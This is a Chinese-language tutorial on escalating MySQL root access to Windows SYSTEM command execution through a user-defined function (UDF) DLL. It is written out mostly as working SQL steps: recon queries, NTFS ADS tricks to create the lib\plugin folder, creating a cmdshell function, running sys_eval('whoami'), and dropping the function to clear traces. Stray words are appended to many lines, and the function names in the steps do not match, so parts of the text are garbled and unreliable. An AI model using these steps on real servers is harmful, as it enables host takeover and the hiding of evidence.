0x00 原理
UDF(user-defined function)是MySQL的一个拓展接口,也可称之为用户自定义函数,它是用来拓展MySQL的技术手段,能够说是数据库功能的一种扩展。 经过在udf文件中定义新函数,对MYSQL的功能进行扩充,能够执行系统任意命令,将MYSQL帐号root转化为系统system权限。html
0x01 利用条件
-
mysql版本大于5.1,udf.dll文件必须放置在mysql安装目录的lib\plugin文件夹下mysql
-
mysql版本小于5.1, udf.dll文件在windows server 2003下放置于c:\windows\system32目录,在windows server 2000下放置在c:\winnt\system32目录。sql
-
掌握mysql数据库的帐户,从拥有对mysql的
insert和delete权限,以建立和抛弃函数。拥有能够将udf.dll写入相应目录的权限。shell -
能够将udf.dll写入到相应目录的权限。数据库
0x02 提权关键
导出UDF文件到指定路径windows
0x03 提权步骤
一、获取数据库版本、数据位置以及插件位置等信息服务器
select version();//获取数据库版本 select user();//获取数据库用户 select @@basedir ;//获取安装目录 show variables like '%plugins%'; //寻找mysql安装路径
二、导出UDF文件 关于UDF文件: sqlmap中有现成的udf文件,分为32位和64位,必定要选择对版本 关于路径:网络
MySQL<5.0,导出路径随意; 5.0 <= MySQL<5.1,则须要导出至目标服务器的系统目录(如:c:/windows/system32/) MySQL 5.1以上版本,必需要把udf.dll文件放到MySQL安装目录下的lib\plugin文件夹下才能建立自定义函数。
用NTFS ADS流模式突破进而建立文件夹函数
select @@basedir; //查找到mysql的目录 select 'It is dll' into dumpfile 'C:\\Program Files\\MySQL\\MySQL Server 5.1\\lib::$INDEX_ALLOCATION'; //利用NTFS ADS建立lib目录 select 'It is dll' into dumpfile 'C:\\Program Files\\MySQL\\MySQL Server 5.1\\lib\\plugin::$INDEX_ALLOCATION'; //利用NTFS ADS建立plugin目录
三、建立cmdshell 函数url
create function cmdshell returns string soname ‘lib_mysqludf_sys.dll’;
四、执行自定义函数
select sys_eval(‘whoami’);
五、清除痕迹
drop function cmdshell
0x04 参考
https://www.cnblogs.com/R4v3n/articles/8722657.html 《网络攻防实战研究——漏洞利用与提权》